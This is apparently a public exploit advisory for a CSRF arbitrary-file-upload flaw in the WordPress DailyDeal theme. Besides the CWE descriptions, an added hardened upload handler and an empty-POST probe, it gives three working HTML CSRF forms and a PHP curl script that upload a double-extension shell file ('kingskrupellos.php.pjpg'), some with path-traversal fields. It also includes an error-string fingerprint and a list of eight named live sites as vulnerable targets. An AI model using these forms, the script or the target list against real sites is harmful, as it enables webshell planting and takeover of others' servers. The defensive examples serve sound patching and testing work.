####################################################################
# Exploit Title : WordPress DailyDeal Themes 3.0 CSRF Shell Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 19/03/2020
# Vendor Homepage : templatic.com
# Software Link : themesinfo.com/?search_type=folder&search=DailyDeal
# Software Affected Version : 3.0.10
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type :
CWE-352 [ Cross-Site Request Forgery (CSRF) ]
CWE-264 [ Permissions, Privileges, and Access Controls ]
CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
####################################################################
# Impact :
***********
The DailyDeal theme for WordPress ships an upload script (library/includes/upload.php)
that the exploit forms and the curl script below reach with no session cookie and no
WordPress nonce, and that does not restrict the type of file it stores. An attacker, or a
victim's browser submitting a forged form, can upload a file such as kingskrupellos.php.pjpg;
where the web server hands any file with a .php component to the PHP interpreter (Apache
AddHandler with multiple extensions, for example), the upload executes in the context of the
web server process. This may facilitate unauthorized access or privilege escalation; other
attacks are also possible.
CWE-352: Cross-Site Request Forgery (CSRF)
******************************************
The web application does not, or can not, sufficiently verify whether a well-formed,
valid, consistent request was intentionally provided by the user who submitted the request.
When a web server is designed to receive a request from a client without any mechanism
for verifying that it was intentionally sent, then it might be possible for an attacker to trick a
client into making an unintentional request to the web server which will be treated as an
authentic request. This can be done via a URL, image load, XMLHttpRequest, etc. and
can result in exposure of data or unintended code execution.
CWE-264: Permissions, Privileges, and Access Controls
**************************************************
Weaknesses in this category are related to the management of permissions, privileges, and
other security features that are used to perform access control.
CWE-434: Unrestricted Upload of File with Dangerous Type
****************************************************
The software allows the attacker to upload or transfer files of dangerous types that can
be automatically processed within the product's environment.
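# Hardened Upload Handler (added example) :
******************************************
What the fix for the three weaknesses above looks like, as an added example that is not part of
this advisory and not the DailyDeal theme's code. The theme's upload script is not reproduced
here, so the "before" is only a sketch of the pattern the CWEs describe; the hook name, the
function names and the nonce action 'dailydeal_upload' are assumptions. The hardened handler
takes each CWE in turn: a nonce bound to the user's session (CWE-352), a capability check
(CWE-264), and an extension-plus-content allowlist that rejects a name like shell.php.pjpg (CWE-434).

```php
<?php
/*
 * Added example, not the advisory's or the theme's code: a hardened replacement
 * for a theme-level upload endpoint, written as WordPress theme PHP (functions.php
 * style). Hook, function and nonce action names are assumptions.
 */

// Pattern the advisory describes (reconstructed sketch, NOT the theme's source):
// anyone who can reach the URL may POST a multipart body, and the file is stored
// under the client-chosen name. No nonce, no capability check, no allowlist, so
// "shell.php.pjpg" is accepted and, on a server that runs any file with a .php
// component, executed as PHP.
//
//   move_uploaded_file($_FILES['file']['tmp_name'], $dir . $_FILES['file']['name']);

// Hardened form: route the upload through admin-ajax.php so WordPress' nonce,
// capability and file-type helpers are available. Deliberately no
// 'wp_ajax_nopriv_...' registration: anonymous users get no endpoint at all.
add_action('wp_ajax_dailydeal_upload', 'dailydeal_handle_upload');

function dailydeal_handle_upload() {
    // CWE-352: the request must carry a token issued to this user's session.
    // A forged cross-site form cannot read the token, so the call dies here.
    check_ajax_referer('dailydeal_upload', '_wpnonce');

    // CWE-264: require the capability WordPress itself uses for media uploads.
    if (!current_user_can('upload_files')) {
        wp_send_json_error('insufficient privileges', 403);
    }

    if (empty($_FILES['file']) || $_FILES['file']['error'] !== UPLOAD_ERR_OK) {
        wp_send_json_error('invalid upload', 400);
    }

    // CWE-434: allowlist by extension AND sniffed content. "x.php.pjpg" has the
    // extension "pjpg", which is not in the list, so it is rejected outright
    // instead of being stored under a name the web server might execute.
    $allowed = array(
        'jpg|jpeg' => 'image/jpeg',
        'png'      => 'image/png',
        'gif'      => 'image/gif',
    );
    $check = wp_check_filetype_and_ext(
        $_FILES['file']['tmp_name'],
        $_FILES['file']['name'],
        $allowed
    );
    if (empty($check['ext']) || empty($check['type'])) {
        wp_send_json_error('file type not allowed', 415);
    }

    // Let WordPress move the file into wp-content/uploads under a sanitized,
    // unique name; it never reuses the client-supplied path or name verbatim.
    $result = wp_handle_upload($_FILES['file'], array(
        'test_form' => false,
        'mimes'     => $allowed,
    ));
    if (isset($result['error'])) {
        wp_send_json_error($result['error'], 400);
    }
    wp_send_json_success(array('url' => $result['url']));
}

// The browser side must carry the nonce: wp_nonce_field() emits the hidden
// _wpnonce input that check_ajax_referer() validates above.
function dailydeal_upload_form_html() {
    ob_start();
    ?>
    <form method="post" enctype="multipart/form-data"
          action="<?php echo esc_url(admin_url('admin-ajax.php')); ?>">
        <input type="hidden" name="action" value="dailydeal_upload">
        <?php wp_nonce_field('dailydeal_upload', '_wpnonce'); ?>
        <input type="file" name="file">
        <button type="submit">Upload</button>
    </form>
    <?php
    return ob_get_clean();
}
```

Two caveats. wp_check_filetype_and_ext() rejects "x.php.pjpg" because its extension is "pjpg", not because it notices the ".php" in the middle; the double-extension trick only bites where the web server (Apache mod_php with AddHandler, for instance) executes any file carrying a .php component, so the upload directory should additionally have PHP execution disabled at the web-server level. And the nonce only helps if the handler is unreachable without it: a second, unhooked copy of the old upload.php left in the theme directory would still be exploitable exactly as this advisory describes.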
####################################################################
# Arbitrary File Upload / Unauthorized File Insert / Shell Upload Exploit :
***************************************************************
/wp-content/themes/DailyDeal/monetize/upload/
/wp-content/themes/DailyDeal/monetize/upload/index.php
/wp-content/themes/DailyDeal/library/includes/upload.php
# CSRF Cross Site Request Forgery Exploiter 1 =>
******************************************
<form method="POST" action="VULNERABLEWEBSITEHERE/wp-content/themes/DailyDeal/library/includes/upload.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
# CSRF Cross Site Request Forgery Exploit 2 =>
****************************************
<html>
<head><title>WordPress DailyDeal Themes Exploiter</title></head>
<body>
<form action="http://[VULNERABLEWEBSITE]/wp-content/themes/DailyDeal/library/includes/upload.php" method="post" enctype="multipart/form-data">
<input type="file" name="file" id="file"><br>
<input name="form_id" value="../../../" type="hidden">
<input name="name" value="kingskrupellos.php.pjpg" type="hidden">
<input name="gform_unique_id" value="../../" type="hidden">
<input name="field_id" value="" type="hidden">
<input type="submit" name="gform_submit" value="submit">
</form>
</body>
</html>
# CSRF Cross Site Request Forgery Exploit 3 =>
****************************************
<html>
<body>
<form action="http://www.[VULNERABLESITE].gov/wp-content/themes/DailyDeal/library/includes/upload.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="drm_add_new_album" />
<input type="hidden" name="album_name" value="WordPress DailyDeal Themes Exploiter Cyberizm" />
<input type="hidden" name="album_desc" value="WordPress DailyDeal Themes Exploiter Cyberizm" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
PHP Exploiter Code :
*********************
<?php
// Posts the double-extension file straight to the theme's upload script.
// The "@file" CURLOPT_POSTFIELDS syntax the original used was disabled by
// default in PHP 5.6 and removed in PHP 7; CURLFile is the replacement and
// sends the same multipart part (default MIME type application/octet-stream).
$target     = "http://127.0.0.1/wp-content/themes/DailyDeal/library/includes/upload.php";
$uploadfile = "kingskrupellos.php.pjpg"; /// KingSkrupellos ! Cyberizm Digital Security Army ^_^

$ch = curl_init($target);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('file' => new CURLFile($uploadfile)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$postResult = curl_exec($ch);
if ($postResult === false) {
    echo "curl error: " . curl_error($ch) . "\n";
}
curl_close($ch);
print "$postResult";
?>
# Vulnerability Error (string returned by the upload script, usable as a fingerprint) :
****************************************************************************
ERROR:invalid upload
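# Non-destructive Endpoint Check (added example) :
***********************************************
A reachability check for the three paths listed above, as an added example that is not part of
this advisory: it sends a POST with an empty body, so nothing is stored on the target, and
classifies the reply. It assumes, because the advisory prints the error string without the
request that produced it, that upload.php answers a POST carrying no file part with
"ERROR:invalid upload"; a plain 200 without that string is reported separately, since it only
proves the path exists.

```php
<?php
/*
 * Added example, not part of the advisory: probe the DailyDeal upload paths
 * without uploading anything. Run only against hosts you are authorised to test:
 *     php dailydeal-probe.php https://example.com
 *
 * Assumption: upload.php returns "ERROR:invalid upload" for a POST with no file
 * part (the advisory shows the string, not the request that triggered it).
 */

const DAILYDEAL_PATHS = array(
    '/wp-content/themes/DailyDeal/library/includes/upload.php',
    '/wp-content/themes/DailyDeal/monetize/upload/index.php',
    '/wp-content/themes/DailyDeal/monetize/upload/',
);

// Build the candidate URLs for one site, tolerating a trailing slash on $base.
function dailydeal_candidate_urls(string $base): array {
    $base = rtrim($base, '/');
    return array_map(fn($p) => $base . $p, DAILYDEAL_PATHS);
}

// Classify one reply. Only the literal error string counts as a fingerprint of
// the theme's upload script; a bare 200 says the path exists and nothing more.
function dailydeal_classify(int $status, string $body): string {
    if (stripos($body, 'ERROR:invalid upload') !== false) {
        return 'fingerprint';   // the theme upload script answered
    }
    if ($status === 200) {
        return 'reachable';     // path exists, no fingerprint in the body
    }
    if ($status === 401 || $status === 403) {
        return 'blocked';       // something in front of the script refuses POST
    }
    return 'absent';            // 404, redirect, connection failure, ...
}

// Same method the exploit uses (POST), but with an empty body and no file field,
// so the script has nothing it could write to disk.
function dailydeal_probe(string $url): array {
    $ch = curl_init($url);
    curl_setopt_array($ch, array(
        CURLOPT_POST           => true,
        CURLOPT_POSTFIELDS     => '',        // Content-Length: 0, no multipart
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false,     // a redirect is not a hit
        CURLOPT_CONNECTTIMEOUT => 10,
        CURLOPT_TIMEOUT        => 15,
        CURLOPT_USERAGENT      => 'dailydeal-probe/1.0',
    ));
    $body   = (string) curl_exec($ch);
    $status = (int) curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
    curl_close($ch);
    return array(
        'url'     => $url,
        'status'  => $status,
        'verdict' => dailydeal_classify($status, $body),
    );
}

if (PHP_SAPI === 'cli' && isset($argv[1])) {
    foreach (dailydeal_candidate_urls($argv[1]) as $url) {
        $r = dailydeal_probe($url);
        printf("%-12s %3d  %s\n", $r['verdict'], $r['status'], $r['url']);
    }
}
```

A 'fingerprint' verdict means the script is reachable from an unauthenticated client, which is the precondition for the forms above; whether a real file would then be accepted, and whether the server would execute a .php.pjpg name, still has to be confirmed separately, and the 'blocked' verdict is the state to expect once a WAF rule or web-server deny rule has been put in front of the path.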
####################################################################
# Example Vulnerable Sites :
************************
[+] millionportals.com/wp-content/themes/DailyDeal/library/includes/upload.php
[+] descuento.site/wp-content/themes/DailyDeal/library/includes/upload.php
[+] aka.dotd.sale/wp-content/themes/DailyDeal/library/includes/upload.php
[+] monsterlasvegasdeals.com/wp-content/themes/DailyDeal/library/includes/upload.php
[+] bizlistedeals.com/wp-content/themes/DailyDeal/library/includes/upload.php
[+] yasuiii.com/wp-content/themes/DailyDeal/library/includes/upload.php
[+] oneitemdeals.com/wp-content/themes/DailyDeal/library/includes/upload.php
[+] bigdailydeals.co.uk/wp-content/themes/DailyDeal/monetize/upload/index.php
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################